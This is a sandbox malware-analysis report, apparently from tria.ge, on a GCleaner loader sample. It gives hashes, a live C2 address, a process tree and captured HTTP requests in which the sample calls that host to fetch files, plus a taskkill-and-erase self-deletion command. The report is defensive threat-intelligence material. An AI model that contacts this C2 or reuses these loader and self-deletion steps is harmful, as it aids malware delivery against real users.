Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    103s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07/09/2024, 18:13 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe

  • Size

    294KB

  • MD5

    e31f3a2e963a7e7129a9d6ae35c6384d

  • SHA1

    4ff2507be78ebc8ad15374f4cad94258cc7de470

  • SHA256

    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34

  • SHA512

    c646ad6f94f34850e3fb29d4936abd33e79680b556936dd11f36743f6c5f264ba1a84b90ab5adf645803991c7131c8de021c82f1b98974100203e42764ead623

  • SSDEEP

    6144:2CBbfnESxoe7rWI8SRVOLss9E5dhDs0U8S/wjfF/Q:2gn9xoe7LzRQJ9As0vR/

Score
10/10
gcleanerdiscoveryloader

Malware Config

Extracted

Family

gcleaner

C2

80.66.75.114

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    "C:\Users\Admin\AppData\Local\Temp\a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe" & exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im "a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3888

Network

  • flag-ru
    GET
    http://80.66.75.114/add?substr=one&s=two
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /add?substr=one&s=two HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:07 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:07 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:09 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-us
    DNS
    114.75.66.80.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.75.66.80.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.227.13
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:18 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:20 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:23 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:25 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:27 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=96
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:30 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:32 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=94
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:34 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=93
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 07 Sep 2024 18:14:37 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • 80.66.75.114:80
    http://80.66.75.114/files/download
    http
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    3.3kB
     1.0kB
     13
    9

    HTTP Request

    GET http://80.66.75.114/add?substr=one&s=two

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download
  • 80.66.75.114:80
    http://80.66.75.114/files/download
    http
    a89101fbb3524961362af049e54e8d2b93ed0a6120b72b9c7824ade4db8a8c34.exe
    6.7kB
     2.8kB
     28
    22

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200
  • 8.8.8.8:53
    114.75.66.80.in-addr.arpa
    dns
    285 B
     518 B
     4
    4

    DNS Request

    114.75.66.80.in-addr.arpa

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.227.13

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\12KX1S8M\download[1].htm
    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    Download Submit

  • memory/4688-1-0x00000000006E0000-0x00000000007E0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/4688-2-0x00000000022C0000-0x00000000022ED000-memory.dmp

    Filesize

    180KB

    Download

  • memory/4688-3-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/4688-6-0x00000000006E0000-0x00000000007E0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/4688-8-0x0000000000400000-0x0000000000451000-memory.dmp

    Filesize

    324KB

    Download

  • memory/4688-9-0x00000000022C0000-0x00000000022ED000-memory.dmp

    Filesize

    180KB

    Download

  • memory/4688-10-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/4688-22-0x0000000000400000-0x0000000000451000-memory.dmp

    Filesize

    324KB

    Download

  • memory/4688-23-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.